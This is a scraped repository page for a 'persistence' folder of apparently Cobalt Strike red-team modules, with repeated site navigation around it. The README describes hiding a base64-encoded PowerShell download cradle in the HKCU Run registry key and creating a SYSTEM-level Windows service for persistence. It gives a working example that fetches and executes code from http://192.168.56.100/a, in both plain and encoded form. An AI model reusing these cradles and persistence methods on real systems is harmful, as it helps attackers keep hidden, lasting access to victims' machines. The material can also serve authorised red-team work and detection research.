persistence

History

Name		Name	Last commit message	Last commit date
parent directory ..
images		images
modules		modules
README.md		README.md
persistence.cna		persistence.cna

README.md

Modules

PowerShell HKCU via PSReflect

Accepts a basic base64'd (to avoid escaping pain) download cradle. Writes it to HKCU\Software\Microsoft\Windows\Run\`0pwned using a modified version of PSReflect and RegHide.

Basic Example:

iex ([System.Net.WebClient]::New().DownloadString('http://192.168.56.100/a')) aQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0AOgA6AE4AZQB3ACgAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAwADAALwBhACcAKQApAA==

Windows Service Persistence

Creates a Windows Service (running as SYSTEM) with the specified options and uses sc sdset to assign start/stop permissions to the user SID. Requires you to manually upload a payload.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Files

persistence

persistence

README.md

Modules

PowerShell HKCU via PSReflect

Windows Service Persistence

Files

persistence

Directory actions

More options

Directory actions

More options

Latest commit

History

persistence

Folders and files

parent directory

README.md

Modules

PowerShell HKCU via PSReflect

Windows Service Persistence